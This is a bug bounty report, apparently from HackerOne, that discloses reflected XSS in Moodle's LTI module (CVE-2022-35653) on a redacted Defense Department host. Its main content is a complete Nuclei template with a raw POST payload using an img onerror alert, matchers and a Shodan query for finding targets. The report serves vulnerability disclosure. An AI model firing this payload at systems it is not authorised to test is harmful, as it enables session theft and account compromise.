U.S. Dept Of Defense: Reflected XSS via Moodle on ███ [CVE-2022-35653]

2024-04-0200:06:09

maskedpersian

hackerone.com

cve2022

moodle

xss

vulnerability

mitigation

remote attacker

web security

6 Medium

AI Score

Confidence

High

0.011 Low

EPSS

Percentile

84.8%

JSON

Hi Security Team
I found an xss vulnerability on your website [CVE-2022-35653]
Refrence : https://vulners.com/nuclei/NUCLEI:CVE-2022-35653
if you wanna test this :

id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.00815
    epss-percentile: 0.79909
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query: title:"Moodle"
  tags: cve,cve2022,moodle,xss

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"&gt;&lt;img/src%3d'x'onerror%3dalert('document_domain')&gt;=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "&lt;img/src='x'onerror=alert('document_domain')&gt;"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

Impact

If successful, a cross site scripting attack can severely impact websites and web applications, damage their reputation and relationships with customers. XXS can deface websites, can result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.